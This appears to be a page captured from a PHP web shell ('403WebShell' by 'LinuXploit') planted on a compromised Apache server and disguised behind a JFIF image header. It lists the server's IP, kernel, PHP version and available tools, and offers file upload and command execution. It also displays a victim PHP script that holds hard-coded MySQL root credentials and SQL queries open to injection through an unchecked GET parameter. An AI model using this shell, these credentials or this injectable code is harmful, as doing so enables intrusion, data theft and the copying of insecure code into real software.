????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 3.12.136.98
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/icad.astacus.se/archive/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/icad.astacus.se/archive/checkout.php
<?php
	
		session_start();
		
		$SystemUserId = $_SESSION['ASTACUS_SSO_INFO'][0];

		$link = mysql_connect ("localhost", "root", "root123");
		mysql_select_db ("vpa");
		
		$FileHash = $_GET['filehash'];
		
		$sql = "SELECT * FROM ICADARCHIVECheckedOutFiles where FileHash  = '$FileHash';";
		
		$result = mysql_query($sql);

		$found = false;
		while ($row = mysql_fetch_assoc($result)){ 
			$found = true;
			$userid = $row['UserId'];
		}
		
		if($found == true && $SystemUserId == $userid){
			$sql = "DELETE FROM ICADARCHIVECheckedOutFiles where FileHash  = '$FileHash';";
			$result = mysql_query($sql);
			echo("2");
		}else if($found == true && $SystemUserId != $userid){
			echo("0");
		}else{
			$sql = "INSERT INTO ICADARCHIVECheckedOutFiles VALUES(NULL,'$FileHash',$SystemUserId,'".date("Y-m-d H:i:s")."');";
			$result = mysql_query($sql);
			echo("1");
			
		}
		
?>

Youez - 2016 - github.com/yon3zu
LinuXploit